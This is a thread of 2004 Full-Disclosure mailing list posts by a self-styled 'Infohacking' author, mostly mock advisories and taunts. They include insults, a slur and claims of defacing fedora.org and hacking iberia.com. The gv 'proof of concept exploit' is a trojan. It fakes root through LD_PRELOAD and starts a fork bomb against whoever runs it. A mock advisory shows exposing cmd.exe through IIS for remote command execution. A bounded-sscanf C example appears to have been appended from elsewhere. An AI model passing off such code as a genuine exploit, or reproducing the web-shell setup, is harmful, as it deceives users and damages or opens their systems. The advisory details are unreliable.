Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
>..
>of intent, my manifesto, and it needs no
>end user license agreement or copyright. It is not unreasonable, it is
>not a declaration of war, it is a statement accompanying a point for
>discussion, nothing more.
>What do you think?

I think you suck.

Hugo Vazquez Carapez (Fishface)
Infohacking ev1l hax0rs (www.infohacking.com)
Senior Security Consultant at iDEFENSE labs (www.iDEFENSE.com)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: !SPAM! [Full-Disclosure] Automated ssh scanning
"And yes, they logged in and became root in no time. But I thought the kernel compiled from the latest debian woody kernel-source could be considered to be save. But I was wrong! So I posted the tools used by the attackers to this list and also to the debian security team."

Dear Richard,

You must be very new and a huge clueless moron... not only are you evidencing your low skills but you're wasting time + bandwidth

"But they managed to become root on this machine due to a kernel(?) exploit! Should I then consider any woody system to be insecure to let people work at?"

kernel eh? Please take a quick look into isec.pl and take your time to read some of their advisories. After you've done that, sit down, make some coffee and learn that there are more bugs in the actual linux kernels which are not disclosed yet.

"So I posted the tools used by the attackers to this list and also to the debian security team."

WoW! Just normal tools, no ultra secret toolz.

Be aware that this email is part of the e-jihad tactical strategy to collapse the Internet

Have a nice day

DISCLOSURE TIMELINE

26/08/2004 Initial lame email
26/08/2004 Big laugh of debian security team
26/08/2004 Public disclosure
26/08/2004 We rehack iberia.com

Infohacking e-JIHAD Team
Hugo Vazquez Carapez aka "Fishface"
[Full-Disclosure] fedora.org compromised
The main website of the FEDORA linux distro (www.fedora.org) was compromised and defaced yesterday by Infohacking (www.infohacking.com).

NOTE: "Fedora is a community project dedicated to building high-quality, 3rd party rpms, for the RedHat Linux distribution. Our goal is to facilitate easy package installation through automatic update methods such as apt and yum, while at the same time maintaining first rate security procedures."

Best Regards!
Hugo
http://www.infohacking.com/dir.gif
Re: [Full-Disclosure] IFH-ADV-31339 Exploitable Buffer Overflow in gv
zen-parse ZP! told me that he discovered this vulnerability first... Infohacking was misinformed... so we apologize for this mistake

Anyway, you can still enjoy my leet exploit

On Wed, 04 Aug 2004 03:18:53 -0700 Hugo Vazquez Carapez <[EMAIL PROTECTED]> wrote:
>Exploitable Buffer Overflow in gv
>
>Infohacking Security Advisory 08.04.04
>www.infohacking.com
>Aug 04, 2004
>
>I. BACKGROUND
>
>Infohacking team (me and myself) discovered a new and unreported local root vulnerability in gv.
>
>II. DESCRIPTION
>
>The gv program that is shipped on many Unix systems contains a buffer overflow which can be exploited by an attacker sending a malformed postscript or Adobe pdf file. The attacker would be able to cause arbitrary code to run with the privileges of the victim on his Linux computer. The gv program is a PDF and postscript viewing program for Unix which interfaces with the ghostscript interpreter. It is maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by Johannes Plass. This particular security vulnerability occurs in the source code where an unsafe sscanf() call is used to interpret PostScript and PDF files.
>
>III. ANALYSIS
>
>In order to perform exploitation, an attacker would have to trick a user into viewing a malformed PDF or PostScript file from the command line. This may be somewhat easier for Unix based email programs that associate gv with email attachments. Since gv is not normally installed setuid root, an attacker would only be able to cause arbitrary code to run with the privileges of that user. Other programs that utilize derivatives of gv, such as ggv or kghostview, may also be vulnerable in similar ways.
>
>A proof of concept exploit for Red Hat Linux designed by Hugo is attached to this message. It packages the overflow and shellcode in the "%%PageOrder:" section of the PDF.
>
>/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
> *
> * INFOHACKING RESEARCH - L337 h4x0r t34M
> *
> * hugo <[EMAIL PROTECTED]>
> */
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>/* ASCII bytes of C source text: definitions of getuid(), geteuid(),
> * getgid() and getegid() that each return 0, then a NUL and "/bin/sh". */
>char hellc0de[] =
>"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
>"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
>"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
>"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
>"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
>"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
>"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
>
>int main()
>{
>    FILE *fp;
>    char *offset;
>
>    /* Write that source text to /tmp/own.c and build it as a shared object. */
>    fp=fopen("/tmp/own.c","w");
>    fprintf(fp,"%s",hellc0de);
>    fclose(fp);
>
>    system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
>    /* Child process: after 10 seconds, fork and allocate in an endless loop. */
>    if (fork() == 0) {
>        sleep(10);
>        while (1) { fork(); offset=malloc(512); }
>        exit(0);
>    }
>    /* Parent process: start /bin/sh with the shared object preloaded. */
>    system("LD_PRELOAD=/tmp/own.so /bin/sh");
>    return 0;
>}
>/* -EOF- */
>
>IV. DETECTION
>
>This vulnerability affects the latest version of gv,. An exploit has been tested on Red Hat Linux 9 and fedora core 1
>
>V. WORKAROUNDS
>
>To avoid potential exploitation, users can select alternatives to gv such as Kghostview (included with the KDE desktop environment) for instance. Additionally, the vulnerability does not seem to be exploitable when a file is opened from the gv interface instead of the command line.
>
>VI. CVE INFORMATION
>
>The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2001-0832 to this issue.
>
>VII. DISCLOSURE TIMELINE
>
>03/18/04 Hugo notified the bug to [EMAIL PROTECTED]
>04/11/04 Initial vendor notification - no response
>04/30/04 Secondary vendor notification - no response
>05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a job)
>08/04/04 Public Disclosure
>
>VIII. CREDIT
>
>Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif
>
>Get pwned by script kiddies?
>Call us, we can hack you again.
>
>IX. LEGAL NOTICES
>
>Copyright (c) 2004 INFOHACKING, Inc.
[Full-Disclosure] IFH-ADV-31340 Cmd.exe allow local (and sometimes remote) command execution
Cmd.exe allow local (and sometimes remote) command execution

Infohacking Security Advisory 08.04.04
www.infohacking.com
Aug 04, 2004

I. BACKGROUND

We discovered a very dangerous local code execution vulnerability in all cmd`s. This issue can be exploited using Microsoft Windows (TM) in all its flavours and probably other Operating Systems.

II. DESCRIPTION

Local exploitation of this vulnerability can be achieved by clicking start -> Run and typing: "cmd.exe" (Nt,2000,2003,XP) or "command" (w95 w98 wME) then just press enter. This option will display the black window which allows you to enter commands inside; also you can type help... and several options will be displayed.

Note for users with internet information server: You can put the cmd.exe into the c:\inetpub\wwwroot\scripts and then execute commands remotely

HTTP://mypc/scripts/cmd.exe?/c+dir

WOW! OH MY GOD!

III. ANALYSIS

A malicious user could execute arbitrary code and take the full control over the box with this high vulnerability. There is no patch... but we strongly recommend disabling cmd.exe by deleting the file itself or removing execution perms.

IV. DETECTION

Infohacking has confirmed that all windows versions up to 3.11 are vulnerable to this issue.

V. WORKAROUNDS

No work.. indeed.

VI. CVE INFORMATION

This is an 0day bug... so still no bid and CVE.

VII. DISCLOSURE TIMELINE

03/18/04 Hugo notified the bug to [EMAIL PROTECTED]
04/11/04 Initial vendor notification - no response
04/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a job)
08/04/04 Public Disclosure

VIII. CREDIT

Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Copyright (c) 2004 INFOHACKING, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat community, please hack and remove us from the net
[Full-Disclosure] IFH-ADV-31339 Exploitable Buffer Overflow in gv
Exploitable Buffer Overflow in gv

Infohacking Security Advisory 08.04.04
www.infohacking.com
Aug 04, 2004

I. BACKGROUND

Infohacking team (me and myself) discovered a new and unreported local root vulnerability in gv.

II. DESCRIPTION

The gv program that is shipped on many Unix systems contains a buffer overflow which can be exploited by an attacker sending a malformed postscript or Adobe pdf file. The attacker would be able to cause arbitrary code to run with the privileges of the victim on his Linux computer. The gv program is a PDF and postscript viewing program for Unix which interfaces with the ghostscript interpreter. It is maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by Johannes Plass. This particular security vulnerability occurs in the source code where an unsafe sscanf() call is used to interpret PostScript and PDF files.

III. ANALYSIS

In order to perform exploitation, an attacker would have to trick a user into viewing a malformed PDF or PostScript file from the command line. This may be somewhat easier for Unix based email programs that associate gv with email attachments. Since gv is not normally installed setuid root, an attacker would only be able to cause arbitrary code to run with the privileges of that user. Other programs that utilize derivatives of gv, such as ggv or kghostview, may also be vulnerable in similar ways.

A proof of concept exploit for Red Hat Linux designed by Hugo is attached to this message. It packages the overflow and shellcode in the "%%PageOrder:" section of the PDF.

/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
 *
 * INFOHACKING RESEARCH - L337 h4x0r t34M
 *
 * hugo <[EMAIL PROTECTED]>
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* ASCII bytes of C source text: definitions of getuid(), geteuid(),
 * getgid() and getegid() that each return 0, then a NUL and "/bin/sh". */
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

int main()
{
    FILE *fp;
    char *offset;

    /* Write that source text to /tmp/own.c and build it as a shared object. */
    fp=fopen("/tmp/own.c","w");
    fprintf(fp,"%s",hellc0de);
    fclose(fp);

    system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
    /* Child process: after 10 seconds, fork and allocate in an endless loop. */
    if (fork() == 0) {
        sleep(10);
        while (1) { fork(); offset=malloc(512); }
        exit(0);
    }
    /* Parent process: start /bin/sh with the shared object preloaded. */
    system("LD_PRELOAD=/tmp/own.so /bin/sh");
    return 0;
}
/* -EOF- */

IV. DETECTION

This vulnerability affects the latest version of gv,. An exploit has been tested on Red Hat Linux 9 and fedora core 1

V. WORKAROUNDS

To avoid potential exploitation, users can select alternatives to gv such as Kghostview (included with the KDE desktop environment) for instance. Additionally, the vulnerability does not seem to be exploitable when a file is opened from the gv interface instead of the command line.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2001-0832 to this issue.

VII. DISCLOSURE TIMELINE

03/18/04 Hugo notified the bug to [EMAIL PROTECTED]
04/11/04 Initial vendor notification - no response
04/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a job)
08/04/04 Public Disclosure

VIII. CREDIT

Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Copyright (c) 2004 INFOHACKING, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat community, please hack and remove us from the net
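The message above attributes the overflow to an unsafe sscanf() call and names the "%%PageOrder:" comment as the carrier. The following C code is an added example, not gv's code and not part of the original message: it reads such a value with a field width and rejects tokens that do not fit. The function name parse_page_order and the 31-byte limit are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DSC_KEY     "%%PageOrder:"   /* literal text, not a format string */
#define VALUE_WIDTH 31               /* assumed limit for this example */
#define STR_(x) #x
#define STR(x)  STR_(x)

/*
 * Unsafe pattern of the kind the advisory describes, shown only as a comment:
 *     char text[VALUE_WIDTH + 1];
 *     sscanf(line + strlen(DSC_KEY), "%s", text);
 * "%s" has no field width, so it copies until the next whitespace however
 * long the token in the file is.
 */

/*
 * Bounded version. Returns 0 and fills `out` on success, -1 if the line is
 * not a PageOrder comment or carries no value, -2 if the value does not fit.
 */
int parse_page_order(const char *line, char out[VALUE_WIDTH + 1])
{
    size_t klen = strlen(DSC_KEY);
    const char *p;
    int used = 0;

    out[0] = '\0';
    if (strncmp(line, DSC_KEY, klen) != 0)
        return -1;
    p = line + klen;

    /* "%31s" stores at most 31 bytes plus the NUL; %n records where it stopped. */
    if (sscanf(p, "%" STR(VALUE_WIDTH) "s%n", out, &used) != 1)
        return -1;

    /* Stopping in the middle of a token means the value was truncated. */
    if (p[used] != '\0' && !isspace((unsigned char)p[used])) {
        out[0] = '\0';
        return -2;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample lines, not taken from a real document. */
    char big[256];
    char out[VALUE_WIDTH + 1];
    int rc;

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    memcpy(big, DSC_KEY " ", strlen(DSC_KEY) + 1);

    rc = parse_page_order("%%PageOrder: Ascend", out);
    printf("normal line   -> %d \"%s\"\n", rc, out);
    rc = parse_page_order(big, out);
    printf("oversize line -> %d \"%s\"\n", rc, out);
    return 0;
}
```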
[Full-Disclosure] IFH-ADV-31338 Denial of service vulnerability in solar devices.
Infohacking Security Advisory 06.21.04
www.infohacking.com
Jun 21, 2004

I. BACKGROUND

We discovered a very dangerous denial of service vulnerability in all solar devices. This issue can be exploited easily in several ways.

II. ANALYSIS

The exploitation of this issue can be achieved by:

a) locally -> insulating tape: You must use an opaque tape and place it over the photovoltaic cell. We recommend using TESA (TESA is the main infohacking sponsor -> tesatape.com )

b) remotely -> extinguishing the light of the room (only works between 8:00pm to 8:00am). This tecneeq can be combined with "bloking the windows(tm)" (yeah blackhat teecneeq).

*Appendix 1: "bloking the windows(tm)":
- What we need? cardboards and TESA(of course -> tesatape.com)
- How? RTFM?
- which one? argf! sorry this is a fucking manual.. and you are reading it, so "block da window with the cardboards" and then fix it with TESA(tesatape.com click on IFH banner)

c) massively -> Denial of Sunlight (ppl from Greenland and north of .ru shouldn't try)

This is only allowed for very,very,very,very,very leet ppl like us (infohacking rulz)

1- You need to hack some satellites, and to derive its trajectory causing a partial eclipse on the wished zone.
2- Ozone injection; This way can be done injecting squid ink into O3 molecules.

III. SOLUTION

USE BATTERIES! U faggot!!! (Rock users also can use AC/DC)

IV. WORKAROUNDS

No work.. indeed.

V. CVE INFORMATION

This is an 0day bug... so still no bid and CVE.

VII. DISCLOSURE TIMELINE

23 - AC Hugo noticed the first solar eclipse
03/11/04 Hugo buy his first palm
03/30/04 TESA buy a solar calculator for infohacking team
05/20/04 We hack iberia.com
06/17/04 File Source disclosure vulnerability in all web servers.- Discloses (leet skills)
06/21/04 Public Disclosure

VIII. CREDIT

Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Copyright (c) 2004 INFOHACKING, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat community, please hack and remove us from the net
[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
File Source disclosure vulnerability in all web servers.

Infohacking Security Advisory 04.16.04
www.infohacking.com
Jun 16, 2004

I. BACKGROUND

We discovered a very dangerous file source disclosure vulnerability in all webservers. This issue can be exploited using Microsoft Internet Explorer and probably other browsers.

II. DESCRIPTION

Remote exploitation of this issue can be achieved by clicking with the right button into the website and selecting the "view source code" option. This option will display the contents of the html code. For more leet exploitation is also possible using

lynx --source http://vulnerable.site/file.html

III. ANALYSIS

Successful exploitation allows an attacker to gain very very very sensible information of the website.

IV. DETECTION

Infohacking has confirmed that all webservers are vulnerable to this problem. Sites like microsoft, securityfocus, hack.co.za and others are vulnerable too!

V. WORKAROUNDS

No work.. indeed.

VI. CVE INFORMATION

This is an 0day bug... so still no bid and CVE.

VII. DISCLOSURE TIMELINE

02/18/04 Hugo notified the bug to [EMAIL PROTECTED]
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com
06/17/04 Public Disclosure

VIII. CREDIT

Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Copyright (c) 2004 INFOHACKING, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat community, please hack and remove us from the net